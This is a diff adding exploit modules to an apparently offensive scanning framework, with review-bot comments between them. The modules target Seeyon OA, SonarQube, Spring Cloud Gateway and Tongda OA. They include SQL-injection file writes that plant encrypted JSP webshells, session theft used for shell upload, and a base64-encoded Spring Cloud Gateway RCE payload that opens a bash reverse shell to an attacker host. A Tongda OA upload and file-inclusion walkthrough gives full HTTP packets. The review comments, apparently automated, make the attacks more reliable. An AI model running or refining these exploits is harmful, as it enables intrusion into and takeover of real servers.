if r.status_code==500 and '"message":null' in r.text: + print('\033[32m[#]成功写入webshell') + print('webshell地址:'+target+'/seeyon/Faltform.jspx'+'\n'+'[32m[#]密码:szxsd') + else: + print('[32m[#]写入webshell失败') + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No 
newline at end of file diff --git a/Moudle/Seeyon/Information_seeyou.py b/Moudle/Seeyon/Information_seeyou.py new file mode 100644 index 0000000..aba7610 --- /dev/null +++ b/Moudle/Seeyon/Information_seeyou.py 
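Review bot: The ANSI colour prefixes in `exp()` are inconsistent: the first two prints use `'\033[32m[#]...'` but the last two write `'[32m[#]...'` without the `\033` escape, so a literal `[32m` appears in the output, and the green colour is never reset with `\033[0m`, so it bleeds into whatever the terminal prints next. Either use the escape consistently and terminate each coloured string with `\033[0m`, or drop the colour codes as the other modules do. `import sys` is unused here as well.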
@@ -0,0 +1,63 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua, headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_Info_Leak' +AUTHOR="Joker" +REMARK='致远OA 敏感信息泄露' +FOFA_RULE='title="致远A8+协同管理软件.A6"' +###################################################### + +def poc(target): + result = {} + vuln_url1 = target + "/yyoa/createMysql.jsp" + vuln_url2 = target + "/yyoa/ext/createMysql.jsp" + vuln_url3 = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" + vuln_url4 = target + "/yyoa/assess/js/initDataAssess.jsp" + vuln_url5 = target + "/seeyon/management/status.jsp" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url1, headers=headers, verify=False, timeout=5) + r2 = requests.get(url=vuln_url2, headers=headers, verify=False, timeout=5) + r3 = requests.get(url=vuln_url3, headers=headers, verify=False, timeout=5) + r4 = requests.get(url=vuln_url4, headers=headers, verify=False, timeout=5) + r5 = requests.get(url=vuln_url5, headers=headers, verify=False, timeout=5) + if 'root' in r1.text and r1.status_code == 200: + result['信息泄露path1'] = vuln_url1 + else: + pass + if 'root' in r2.text and r2.status_code == 200: + result['信息泄露path2'] = vuln_url2 + else: + pass + if 'xls' in str(r3.headers).lower() and r3.status_code == 200: + result['信息泄露ppath3'] = vuln_url3 + else: + pass + if 'personList' in r4.text and r4.status_code == 200: + result['信息泄露path4'] = vuln_url4 + else: + pass + if 'Password' in r5.text and r5.status_code == 200: + result['信息泄露path5'] = vuln_url5 +" 默认密码:WLCCYBD@SEEYON" + else: + pass + + if result: + tmpdic={ + 'target':target, + 'poc':NAME + } + result=dict(tmpdic,**result) + return result + except: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1") 
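Review bot: A single timeout on any of the five sequential GETs in `poc` discards every finding, because all five requests sit in one `try` whose bare `except: pass` drops the partially built `result` (r1 can already have confirmed `createMysql.jsp` when r5 times out). Each probe should be fetched and checked in its own `try`, narrowed to `requests.RequestException`, so one unreachable path does not hide the others; a table-driven loop does this without five copies of the same code. The `ua` import is unused, and the value stored for path5 is the URL with a note appended (`vuln_url5 + " 默认密码:..."`), which is fine for display but will not round-trip as a URL for anything consuming the dict, so it may be worth a separate key.
```python
def poc(target):
    result = {}
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    probes = [
        ('信息泄露path1', target + "/yyoa/createMysql.jsp", lambda r: 'root' in r.text),
        ('信息泄露path2', target + "/yyoa/ext/createMysql.jsp", lambda r: 'root' in r.text),
        ('信息泄露ppath3', target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", lambda r: 'xls' in str(r.headers).lower()),
        ('信息泄露path4', target + "/yyoa/assess/js/initDataAssess.jsp", lambda r: 'personList' in r.text),
        ('信息泄露path5', target + "/seeyon/management/status.jsp", lambda r: 'Password' in r.text),
    ]
    for key, url, hit in probes:
        try:
            r = requests.get(url=url, headers=headers, verify=False, timeout=5)
        except requests.RequestException:
            continue  # one unreachable path must not hide the others
        if r.status_code == 200 and hit(r):
            result[key] = url
    # … unchanged: tmpdic merge and return …
```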
diff --git a/Moudle/Seeyon/Seeyon_OA_SQLInjection.py b/Moudle/Seeyon/Seeyon_OA_SQLInjection.py new file mode 100644 index 0000000..49f7de0 --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_SQLInjection.py 
@@ -0,0 +1,97 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import random +import re +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_SQLInjection' +AUTHOR="Joker" +REMARK='致远OA SQL注入漏洞' +FOFA_RULE='title="致远A8+协同管理软件.A6"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if '序号' in r1.text and "@@basedir" in r1.text and r1.status_code == 200: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except Exception as e: + pass + +def exp(target): + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" + vuln_ur2 = target + "/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if '序号' in r1.text and "@@basedir" in r1.text and r1.status_code == 200: + OA_dir = re.findall(r'>(.*)\\UFseeyon\\', r1.text)[0] + OA_dir = OA_dir[:2] + '/' + OA_dir[3:] + print ('[+] ' + target + "存在致远OA test.jsp sql注入漏洞,安装路径为:{}".format(target, OA_dir)) + webshell_name = "test_upload{}.jsp".format(random.randint(1,999)) + OA_dir = OA_dir + "/UFseeyon/OA/tomcat/webapps/yyoa/{}".format(webshell_name) + exp1(target, OA_dir, webshell_name) + else: + pass + except Exception as e: + print("目标 {} 请求失败".format(target), e) + + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r2 = requests.get(url=vuln_ur2, headers=headers, verify=False, timeout=5) + if r2.status_code 
== 200 and "c4ca4238a0b923820dcc509a6f75849b" in r2.text: + print ("[+] {} 存在致远OA setextno.jsp sql注入漏洞".format(target, vuln_ur2)) + else: + pass + except Exception as e: + print("目标 {} 请求失败".format(target)) + +def exp1(target, OA_dir, webshell_name): + vuln_url = target + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.get(url=vuln_url, verify=False, timeout=5) + if 'already' in response.text and response.status_code == 200: + print("文件写入木马上传失败,目标已存在相同文件,请重新运行") + elif "No Data" in response.text and response.status_code == 200: + print("[o] 文件写入木马上传成功,上传路径为 {}".format(OA_dir)) + exp2(target, webshell_name) + else: + print("[x] 目标 {} 木马上传失败".format(target)) + except Exception as e: + print("[x] 目标 {} 请求失败".format(target), e) + +def exp2(target, webshell_name): + rebe_webshell = "testweb{}.jsp".format(random.randint(1,999)) + vuln_url = target + "/yyoa/{}?f={}".format(webshell_name, rebe_webshell) + data = 
"t=%3C%25%40page%20import%3D%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%22%25%3E%3C%25!class%20U%20extends%20ClassLoader%7BU(ClassLoader%20c)%7Bsuper(c)%3B%7Dpublic%20Class%20g(byte%20%5B%5Db)%7Breturn%20super.defineClass(b%2C0%2Cb.length)%3B%7D%7D%25%3E%3C%25if%20(request.getMethod().equals(%22POST%22))%7BString%20k%3D%223c961f49d5fa96c5%22%3Bsession.putValue(%22u%22%2Ck)%3BCipher%20c%3DCipher.getInstance(%22AES%22)%3Bc.init(2%2Cnew%20SecretKeySpec(k.getBytes()%2C%22AES%22))%3Bnew%20U(this.getClass().getClassLoader()).g(c.doFinal(new%20sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3B%7D%25%3E" + headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + print("[o] 正在请求:{}".format(vuln_url)) + response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) + if response.status_code == 200: + print("[o] 木马上传成功, 路径为:{}/yyoa/{}".format(target, rebe_webshell)) + print("[o] 请使用冰蝎连接,密码为: szxsd") + else: + print("[x] 木马上传失败,可能被拦截".format(target)) + except Exception as e: + print("[x] 目标 {} 请求失败".format(target), e) + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py b/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py new file mode 100644 index 0000000..d8eedfa --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_SessionLeak_Upload.py 
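Review bot: In `exp`, the success message `"存在致远OA test.jsp sql注入漏洞,安装路径为:{}".format(target, OA_dir)` has one placeholder but two arguments, so it prints the target where the install path should be and `OA_dir` is never shown; use `print("[+] {} 存在致远OA test.jsp sql注入漏洞,安装路径为:{}".format(target, OA_dir))`. `exp1` also drops `headers=headers` from its `requests.get`, unlike `poc` and `exp`, so the `INTO OUTFILE` request goes out with the default python-requests User-Agent. `exp2` prints "木马上传成功" on any 200 without looking at the body, so a WAF block page and a shell that was never written both read as success; fetching `target + "/yyoa/" + rebe_webshell` before announcing it would make the claim hold. `OA_dir[:2] + '/' + OA_dir[3:]` assumes a Windows drive path, which the `\\UFseeyon\\` regex already implies, and deserves a comment saying so.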
@@ -0,0 +1,84 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import sys +import time +import re +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_SessionLeak_Upload' +AUTHOR="Joker" +REMARK='致远OA Session泄露 任意文件上传漏洞' +FOFA_RULE='title="致远OA' +###################################################### + +def poc(target): + result = {} + test_url1 = target + "/seeyon/thirdpartyController.do" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.post(url=test_url1, headers=headers, data=data, verify=False, timeout=5) + if response.status_code == 200 and "a8genius.do" in response.text: + result['target'] = target + result['poc'] = NAME + return result + except: + pass + +def exp(target_url): + vuln_url = target_url + "/seeyon/thirdpartyController.do" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded", + } + data = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) + if response.status_code == 200 and "a8genius.do" in response.text and 'set-cookie' in str(response.headers).lower(): + cookies = response.cookies + cookies = requests.utils.dict_from_cookiejar(cookies) 
+ cookie = cookies['JSESSIONID'] + targeturl = target_url + '/seeyon/fileUpload.do?method=processUpload' + print("[o] 目标 {} 正在上传压缩包文件.... \n[o] Cookie: {}".format(target_url, cookie)) + files = [('file1', ('360icon.png', open('platform.zip', 'rb'), 'image/png'))] + headers = {'Cookie':"JSESSIONID=%s" % cookie} + data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0','isEncrypt': "0"} + response = requests.post(url=targeturl,files=files,data=data, headers=headers,timeout=60,verify=False) + #print(response.text) + reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) + if len(reg)==0: + sys.exit("上传文件失败") + exp2(target_url, cookie, reg, headers) + else: + print("[x] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + pass + +def exp2(target_url, cookie, reg, headers): + vuln_url = target_url + '/seeyon/ajax.do' + datestr = time.strftime('%Y-%m-%d') + post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + reg[0] + '%22%5D' + + headers['Content-Type']="application/x-www-form-urlencoded" + print("[o] 目标 {} 正在解压文件....".format(target_url)) + try: + response = requests.post(vuln_url, data=post,headers=headers,timeout=60,verify=False) + if response.status_code == 500: + print("[+]{}/seeyon/common/designer/pageLayout/123.jsp szxsd 默认Webshell地址".format(target_url)) + else: + print("[x] 目标 {} 不存在漏洞".format(target_url)) + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Seeyon/Seeyon_OA_Session_Leak.py b/Moudle/Seeyon/Seeyon_OA_Session_Leak.py new file mode 100644 index 0000000..5d9d572 --- /dev/null +++ b/Moudle/Seeyon/Seeyon_OA_Session_Leak.py 
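Review bot: `exp` opens `platform.zip` by bare relative name, so the upload only works when the framework is launched from `Moudle/Seeyon`; resolve it next to the module (needs `import os`) and close the handle, which is currently never closed. `sys.exit("上传文件失败")` raises `SystemExit`, which the surrounding `except Exception` does not catch, so one target without the `fileurls` marker aborts a whole batch run; print and return instead. The same `except Exception as e: pass` also hides the `KeyError` when `JSESSIONID` is absent from the cookie jar, so that failure mode is silent.
```python
zip_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'platform.zip')
with open(zip_path, 'rb') as fh:
    files = [('file1', ('360icon.png', fh, 'image/png'))]
    headers = {'Cookie': "JSESSIONID=%s" % cookie}
    data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0', 'isEncrypt': "0"}
    response = requests.post(url=targeturl, files=files, data=data, headers=headers, timeout=60, verify=False)
reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'', response.text, re.I)
if not reg:
    print("[x] 目标 {} 上传文件失败".format(target_url))
    return
exp2(target_url, cookie, reg, headers)
```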
@@ -0,0 +1,32 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Seeyon_OA_Session_Leak' +AUTHOR="Joker" +REMARK='致远OA getSessionList.jsp Session泄漏漏洞' +FOFA_RULE='title="致远OA' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/yyoa/ext/https/getSessionList.jsp?cmd=getAll" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if "/yyoa/index.jsp" not in r.text and "" in r.text and r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['session'] = vuln_url + return result + except: + pass + + +if __name__ == '__main__': + poc('https://127.0.0.1') \ No newline at end of file diff --git a/Moudle/Seeyon/platform.zip b/Moudle/Seeyon/platform.zip new file mode 100644 index 0000000..1771a68 Binary files /dev/null and b/Moudle/Seeyon/platform.zip differ diff --git a/Moudle/SonarQube/CVE_2020_27986.py b/Moudle/SonarQube/CVE_2020_27986.py new file mode 100644 index 0000000..c83582b --- /dev/null +++ b/Moudle/SonarQube/CVE_2020_27986.py 
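Review bot: The condition `"" in r.text` in `poc` is always true (the empty string is a substring of every string), so the check collapses to "status 200 and no `/yyoa/index.jsp` in the body", and any 200 page that is not the login redirect — a custom 404, a WAF block page — is reported as a session leak. Replace it with a marker actually present in a `getSessionList.jsp?cmd=getAll` response, or at minimum a non-empty-body check such as `r.text.strip()`; I cannot tell from the diff what the real marker is. The bare `except: pass` also hides connection errors, so a failed probe and a clean target are indistinguishable to the caller.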
@@ -0,0 +1,36 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecurePlatformWarning + + +# 脚本信息 +###################################################### +NAME='CVE_2020_27986' +AUTHOR="Faith" +REMARK='SonarQube API 未授权访问漏洞' +FOFA_RULE='app="sonarQube-代码管理"' +###################################################### + +def poc(target): + result = {} + url = target + "/api/settings/values" + headers = {"UserAgent":ua} + try: + requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) + r = requests.get(url=url,headers=headers,verify=False,timeout=3) + if "key" in r.text and r.status_code ==200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except : + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Spring/CVE_2022_22947.py b/Moudle/Spring/CVE_2022_22947.py new file mode 100644 index 0000000..574b969 --- /dev/null +++ b/Moudle/Spring/CVE_2022_22947.py 
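Review bot: `headers = {"UserAgent":ua}` does not set the `User-Agent` header — the name is `User-Agent` — so the request goes out with requests' default UA plus a meaningless `UserAgent` header; use `headers = {"User-Agent": ua}`. The warning class disabled is also the wrong one: `verify=False` emits `InsecureRequestWarning`, which every other module in this change disables, not `InsecurePlatformWarning`. `"key" in r.text` is a thin match for `/api/settings/values`; anchoring the unauthenticated-access verdict on the JSON carrying a non-empty `settings` list, e.g. `r.json().get("settings")` inside the existing try, would cut false positives from error pages that happen to contain the word.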
@@ -0,0 +1,70 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +import random +import base64 +import re +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME = 'CVE-2022-22947' +AUTHOR = "境心" +REMARK = 'Spring Cloud Gateway RCE' +FOFA_RULE = 'icon_hash="116323821"' +###################################################### + +def generate_random_str(randomlength=5): + random_str = '' + base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz' + length = len(base_str) - 1 + for i in range(randomlength): + random_str += base_str[random.randint(0, length)] + return random_str + +def poc(target,rem_ip="127.0.0.1",rem_port="80"): + result = {} + str_code = generate_random_str() + if target[-1] == "/": + target = target.strip("/") + url13 = target + "/actuator/gateway/routes/" + str_code + print(url13) + url2 = target + "/actuator/gateway/refresh" + headers = { + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': ua, + 'Connection': 'close', + 'Content-Type': 'application/json' + } + poc_data = "eyAiaWQiOiAiYWExMTIyMzMiLCAiZmlsdGVycyI6IFt7ICJuYW1lIjogIkFkZFJlc3BvbnNlSGVhZGVyIiwgImFyZ3MiOiB7ICJuYW1lIjogIlJlc3VsdCIsICJ2YWx1ZSI6ICIje25ldyBTdHJpbmcoVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuU3RyZWFtVXRpbHMpLmNvcHlUb0J5dGVBcnJheShUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhuZXcgU3RyaW5nW117XCJpZFwifSkuZ2V0SW5wdXRTdHJlYW0oKSkpfSIgfSB9XSwgInVyaSI6ICJodHRwOi8vZXhhbXBsZS5jb20iIH0=" + exp_data = 
"eyAiaWQiOiAiYWExMTIyMzMiLCAiZmlsdGVycyI6IFt7ICJuYW1lIjogIkFkZFJlc3BvbnNlSGVhZGVyIiwgImFyZ3MiOiB7ICJuYW1lIjogIlJlc3VsdCIsICJ2YWx1ZSI6ICIje25ldyBTdHJpbmcoVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuU3RyZWFtVXRpbHMpLmNvcHlUb0J5dGVBcnJheShUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhuZXcgU3RyaW5nW117XCIvYmluL2Jhc2hcIixcIi1jXCIsXCJiYXNoIC1pID4mIC9kZXYvdGNwL3JlbV9pcC9yZW1fcG9ydCAwPiYxXCJ9KS5nZXRJbnB1dFN0cmVhbSgpKSl9IiB9IH1dLCAidXJpIjogImh0dHA6Ly9leGFtcGxlLmNvbSIgfQ==" + + if rem_ip =="127.0.0.1": + a = requests.post(url13, headers=headers,data=base64.b64decode(poc_data).decode().replace('aa112233', str_code), verify=False, timeout=5) + else: + requests.post(url13, headers=headers,data=base64.b64decode(exp_data).decode().replace('rem_ip', rem_ip).replace('rem_port',rem_port).replace('aa112233', str_code), verify=False, timeout=5) + + b= requests.post(url2, headers=headers, verify=False, timeout=5) + res = requests.get(url13, headers=headers, verify=False, timeout=5) + try: + res1 = re.findall("Result = '(.*)'", res.text)[0] + except IndexError as ierro: + pass + else: + result['vurl'] = url13 + result['poc'] = NAME + result['command_res'] = res1 + result['message'] = "存在Spring Cloud Gateway RCE漏洞" + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") + # exp单独调用方式 + # poc("https://27.0.0.1","vpsip","vpsport") diff --git a/Moudle/TDXK/TDXK_Any_file_upload.md b/Moudle/TDXK/TDXK_Any_file_upload.md new file mode 100644 index 0000000..9688749 --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_file_upload.md 
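Review bot: `poc` leaves the route it creates on the target: after the result is read from `GET url13` nothing deletes `/actuator/gateway/routes/<str_code>` or refreshes again, so a filter that executes `id` (or, on the exp path, spawns a reverse shell to `rem_ip`) stays live on the gateway for anyone who later hits it. Add `requests.delete(url13, headers=headers, verify=False, timeout=5)` followed by a second `requests.post(url2, headers=headers, verify=False, timeout=5)` refresh before returning. The `print(url13)` looks like leftover debugging, and the three requests sit outside any `try`, so a timeout raises straight into the framework instead of returning None like the other modules; `target.strip("/")` also trims both ends where `rstrip("/")` is what is meant.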
@@ -0,0 +1,172 @@ +# 1、漏洞描述 + +通达OA存在前台任意文件上传漏洞,结合文件包含,可直接获取服务器权限 + +# 2、影响范围 + +- 受影响的版本有: + +V11版 + +2017版 + +2016版 + +2015版 + +2013增强版 + +2013版 + + + +- 受影响的文件上传漏洞文件: + +/ispirit/im/upload.php + + + +- 受影响的文件包含漏洞文件: + +2013版(可能大多数遇到的是这个): + +/ispirit/interface/gateway.php + + + +2017版: + +/mac/gateway.php + + + +# 3、本地环境搭建 + +下载其中一个受影响的版本安装包,直接傻瓜式下一步自动安装。 + + + +# 4、漏洞复现 + +具体源码审计分析就先不看了,漏洞利用具体分两步,第一先上传后缀为jpg、内容为任意(POC验证)或shell(EXP利用)的jpg图片,第二通过文件包含漏洞,将上传后的文件路径组合到POST传输的json格式的form表单之中,通过访问文件包含漏洞的php文件,即可组合实现漏洞验证/利用。 + +## 4.1、文件上传 + +坑点1: + +Content-Type内容要标明为form表单,并且要有boundary,内容除了那四个-之外,可以自定义,不过要与POST表单中的一致。 + +![](images/1.png) + +坑点2: + +POST表单中,每一个表单与其内容之间要有回车换行,这是文件上传的固定格式,否则上传文件会失败。 + +表单的name值不要改,~~上边三个表单的内容2、123、1最好也别改,会影响返回的内容详细程度。~~ + +更正一下上边删除线的内容,这三个表单里的内容最好全部改为1,因为后边深入调试的时候,poc批量跑一些站,本来有漏洞的出现了漏报,因这里的数字导致返回不一致,详见坑点3. + +脚本和下边的POST包中已更正这些坑点。 + +![](images/2.png) + +坑点3: + +这里后期调试的时候,批量跑了一些站,发现存在漏报,如下,这种的是存在漏洞的,但是因为坑点2中删除线中提到的表单内容,导致返回包没返回全,正则取值的时候,就漏掉了。 + +第二张图中是修正后的返回,其中1标识的是存在漏洞的,2标识的是不存在漏洞的。 + +脚本和下边的POST包中已更正这些坑点。 + +![](images/3.png) + +![](images/4.png) + +坑点4: + +并不是第一步文件传上去了,就算成功了,上边总结的两个包含的php文件路径并不全,所以,也有可能文件传上去了,但是不知道或没有这个包含的php文件路径,也是白搭。调试中也遇到这个问题。 + + +POST上传包: + +``` +POST /ispirit/im/upload.php HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=000 +Connection: close +Content-Length: 559 + + +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; 
name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundarypyfBh1YB4pV8McGB-- +``` + +POST文件上传返回(这个返回内容代表上传成功): + +@符号与_ 之间的字符部分(不包含@与_ )是一个目录名,_到第一个| 之间的字符部分(不包含_与| )是文件名,后边需要用到这两个组合被文件包含的路径,文件后缀与上传的一致,为jpg + +![](images/5.png) + +## 4.2、文件包含 + +不同的通达OA版本,文件包含的php文件不同,一般有两种,详见2、影响范围, + +这里就不用上边说的content-type了,将上边提到的目录名和文件名分别替换POST内容中的相应值即可,下边例子中是替换2108和773815306; + +POST包: + +``` +POST /ispirit/interface/gateway.php HTTP/1.1 +Host: 127.0.0.1 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=000 +Connection: close +Content-Length: 58 + +json={"url":"/general/../../attach/im/2108/773815306.jpg"} +``` + +坑点: + +不知为何,请求没有问题的情况下,burpsuit没有返回上传的文件内容,而浏览器却可以; + +![](images/6.png) + +![](images/7.png) + +# 5、脚本 + +支持poc与exp,配合框架,poc可批量,只返回有漏洞的url,同时返回漏洞被包含文件的form-data,方便验证。 + +exp只支持单个脚本使用,使用方法详见脚本最下方的注释,其中的webshell为冰蝎原始的,有waf的基本上都能拦截,绕waf另说。 + diff --git a/Moudle/TDXK/TDXK_Any_file_upload.py b/Moudle/TDXK/TDXK_Any_file_upload.py new file mode 100644 index 0000000..1e0e7a8 --- /dev/null +++ b/Moudle/TDXK/TDXK_Any_file_upload.py 
@@ -0,0 +1,175 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import json +import requests +import requests.packages.urllib3 +import re +import io +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='TDXK_Any file upload' +AUTHOR="境心" +REMARK='TDXK_前台任意文件上传' +FOFA_RULE='app="TDXK-通达OA"' +###################################################### + +def poc_content(): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + + +------WebKitFormBoundarypyfBh1YB4pV8McGB--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def exp_content(): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="UPLOAD_MODE" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="P" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="DEST_UID" + +1 +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" +Content-Type: image/jpeg + +'; +fwrite($myfile, $txt); +fclose($myfile); +?> +------WebKitFormBoundarypyfBh1YB4pV8McGB--""" + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def verify_poc(target,exp=None): + upload_url = target+"/ispirit/im/upload.php" + headers = { + "User-Agent": ua, + "Content-Type": "multipart/form-data; 
